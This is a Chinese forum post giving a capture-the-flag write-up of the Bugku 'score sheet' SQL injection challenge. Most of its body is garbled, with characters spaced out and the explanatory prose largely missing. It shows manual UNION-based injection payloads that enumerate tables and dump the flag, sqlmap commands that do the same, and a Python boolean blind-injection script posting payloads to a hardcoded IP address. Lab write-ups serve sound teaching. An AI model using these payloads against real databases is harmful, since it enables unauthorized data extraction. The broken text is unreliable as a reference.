搜索

[17994] 2021-04-29_【信息安全学习系列】-bugku成绩单(三种注入方法:手动注入、sqlmap注入、python盲注)

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-04-29_【信息安全学习系列】-bugku成绩单(三种注入方法:手动注入、sqlmap注入、python盲注) - b u g k u s q l m a p p y t h o n   H a c k i n g   H a c k i n g   2 0 2 1 - 0 4 - 2 9 h t t p : / / x . x . x . x : 8 0 0 2 / c h e n g j i d a n / s q l s q l m a p p o s t p y t h o n ( 1 )                                                     a . 1 , 2 , 3   - 1   o r   1 = 1 #     1 ' 1 ' - - + 1 '   # 1 - -   + - - + M a t h E n g l i s h C h i n e s e 1 '   o r d e r b y   4 # 1 '   o r d e r   b y   5 # 4 i d = - 1   i d = - 1 '   u n i o n s e l e c t   1 , 2 , 3 , 4 #     i d = - 1 ' u n i o n   s e l e c t   1 , 2 , 3 , d a t a b a s e ( ) # s k c t f _ f l a g b . 使   i d = - 1 '   u n i o n   s e l e c t   1 , 2 , 3 , g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( ) #   c . i d = - 1 '   u n i o n   s e l e c t   1 , 2 , 3 , g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = 0 x 6 6 6 c 3 4 6 7 #   / / 1 6 d . s k c t f _ f l a g 使 i d = - 1 '   u n i o n   s e l e c t   1 , 2 , 3 , s k c t f _ f l a g   f r o m   f l 4 g # ( 2 )       s q l m a p ( b p ) 1 c o p y t o   f i l e C   3 3 3 . t x t
s q l m a p : s q l m a p . p y   - r   C : 3 3 3 . t x t   - p   i d   c u r r e n t - d b   - r   >     - p   >   c u r r e n t - d b   > c u r r e n t - s k c t f _ f l a g ,   s q l m a p . p y   - r   C : 3 3 3 . t x t   - p   i d   - D   s k c t f _ f l a g   -   - t a b l e s   - D   >   t a b l e s   > ( t a b l e s - )   f l a g f l 4 g   s q l m a p . p y   - r   C : 3 3 3 . t x t   - p   i d   - D   s k c t f _ f l a g   - T   f l 4 g   c o l u m n s   - T   >   c o l u m n s   >   f l 4 g s k c t f _ f l a g   s q l m a p . p y   - r   c : 3 3 3 . t x t   - p   i d   - D   s k c t f _ f l a g   - T   f l 4 g   - C   s k c t f _ f l a g   d u m p   d u m p   > ( d u m p - )   ( 3 )       p y t h o n   s q l i d = 1 ' a n d   1 = 1 # i d = 1 ' a n d   1 = 2 #
  p a y l o a d f l a g f l a g f l a g f l a g f l a g #   - * -   c o d i n g : u t f - 8   - * - i m p o r t   r e q u e s t s i m p o r t   r e   u r l   =   " h t t p : / / 1 2 0 . 2 4 . 8 6 . 1 4 5 : 8 0 0 2 / c h e n g j i d a n / i n d e x . p h p "   b a s e _ p a y l o a d   =   " 1 '   a n d   i f ( a s c i i ( s u b s t r ( { d a t a } , { l e n } , 1 ) ) > { n u m b e r } , 1 , 0 ) # "   # i f ( p r e p 1 . p r e p 2 , p r e p 3 )   p r e p 1 p r e p 2 p r e p 1 p r e p 3 # b a s e _ p a y l o a d   =   " 1 '   a n d   i f ( a s c i i ( s u b s t r ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ n a m e = d a t a b a s e ( )   l i m i t   0 , 1 ) > { n u m } , { l e n } , 1 ) , 1 , 0 ) # " # p a y l o a d   =   " d a t a b a s e ( ) "   # s k c t f _ f l a g   # p a y l o a d   =   " ( s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   l i m i t   0 , 1 ) "   # f l 4 g # p a y l o a d   =   " ( s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' f l 4 g '   l i m i t   0 , 1 ) "   # s k c t f _ f l a g p a y l o a d   =   " ( s e l e c t   s k c t f _ f l a g   f r o m   f l 4 g   l i m i t   0 , 1 ) "   i n f o r m a t i o n = " "   f o r   m   i n   r a n g e ( 1 , 5 0 ) :         f o r   i   i n   r a n g e ( 3 2 , 1 2 9 ) :                 p o s t _ d a t a   =   { " i d " : b a s e _ p a y l o a d . f o r m a t ( d a t a   =   p a y l o a d , l e n   =   m , n u m b e r = i ) }                 r   =   r e q u e s t s . p o s t ( u r l , p o s t _ d a t a )                 r e s u l t a r r   =   r e . f i n d a l l ( r " < t d > ( . + ? ) < t d > " , r . t e x t )                 r e s u l t   =   ' ' . j o i n ( r e s u l t a r r )                 # p r i n t   r e s u l t                   # p r i n t   r . t e x t                 # p r i n t   p o s t _ d a t a                 i f   ' 6 0 '   n o t   i n   r e s u l t :                         i n f o r m a t i o n   + =   c h r ( i )                         b r e a k p r i n t   i n f o r m a t i o n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理